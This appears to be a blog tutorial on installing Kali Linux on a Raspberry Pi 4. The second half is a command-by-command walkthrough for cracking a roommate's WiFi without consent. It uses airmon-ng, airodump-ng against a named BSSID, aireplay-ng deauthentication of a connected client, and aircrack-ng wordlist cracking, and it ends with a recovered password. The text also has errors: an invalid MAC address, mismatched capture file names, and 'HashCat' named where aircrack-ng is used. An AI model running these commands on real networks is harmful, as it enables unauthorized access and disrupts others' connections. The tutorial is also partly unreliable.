Raspberry Pi 4 for Wifi Hacking ?!? 12.Dec.2019

Raspberry Pi 4 for Wifi Hacking ?!?

For those of you who have not heard of Raspberry Pi 4,

I'ts basically an essential tool Security Penetration Testing or the one's we usually call "Hacking". A size of a credit card doesn't mean he is useless and you can put in your wallet too if you wanted. It's a versatile tool in my experience that can do multiple task along with Kali Linux.

Requirements to run this beast:

A Computer or Laptop of course..

Raspberry Pi 4

SD Card [ Preferably 16GB Up]

Have all of that? 
Let us start then
Download the Kali Linux from this Website [White Dome]
Choose the Architecture: armhf (Pi 2/3/4 B/B+)
-
Use Rufus to make your SD Card/ Flash Drive Bootable
[rufus screenshot]
-
If you are using MAC the alternative for Rufus is Etcher
After Bootable Drive has been created. Go to your Desktop or Laptop you wish to do it, insert the USB & Turn it on. 
In my case I tapped F9  to and choose Booting Priority to the USB Device plugged in.
Load Kali and change the password.
[Check if there are some patches or updates too]

Enter  "passwd root" to change your password on the Linux Command Terminal

Enter "apt-get update", "apt-get upgrade", "apt-get dist-upgrade" with time in between each command to update the firmware.
Enable Bluetooth by entering "bluetoothctl", "agent on", "default agent". To begin a scan type "scan on". To pair with a device you type "pair **MAC Address**"
Change your SSH keys to refrain from a "man in the middle" attack. Type "cd /etc/ssh/" and then "-reconfigure openssh-server". Next type "update-rc.d -f ssh remove", "update-rc.d -f ssh defaults", "nano /etc/ssh/sshd_config" which essentially enables run levels for SSH. Ctrl+X will exit the Nano Window. Type "sudo service ssh restart" to apply these changes. And lastly type "update-rc.d -f ssh enable 2 3 4 5" to enable the SSH with these settings.
Auto login can be established by typing: "cd /usr/local/src/re4son-kernel_4*" and then "./re4son-pi-tft-setup -a root". You can then type y to auto login to your completely set up raspberry Pi.
Still keeping up with me? I will now teach you now to decode your selfish roommate's WIFI and use it along with them.
We will use Airmon-ng

This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status.

Open Kali Terminal again and enter this to it
airmon-ng start wlan0
Changing the interface called wlan0 and putting it in monitormode (wlan0mon)
airodump-ng -w test--bssid E2:C8:E2:1Z:E5:D2 -c 1 wlan0mon
We are creating a dump file (-w) called "techhub", we´re listening to all traffic who goes to and from AcessPoint called E2:C8:E2:1Z:E5:D2 (--bssid E2:C8:E2:1Z:E5:D2) and we´re locking on to channel 1 (-c 1) and we using the interface called wlan0mon to do that.
aireplay-ng --deauth 1 -a E0:B9:E5:5C:E3:D3 -c 0C:8B:FD:2B:9E:18 wlan0mon
-- deauth
The number after indicate how many times it will de-authenticate the connection
-a  Access Point MAC address
-c  Destination MAC address (the client who are connected to AP)
wlan0mon = using interface wlan0mon to do that
\\Just wait for it patiently to finish
Now only HashCat to crack the password.

aircrack-ng -w password.lst techhub-01.cap
-w means WordList File
You can search around google for word list combinations
wordlist
So my selfish roommate password is "ED05E6450C"
And that's about it for this tutorial. Raspberry Pi doesn't only do this. There are many tutorials out there to hack more but please do it on a good way and always ask for their permission first before hacking them.

Leave a comment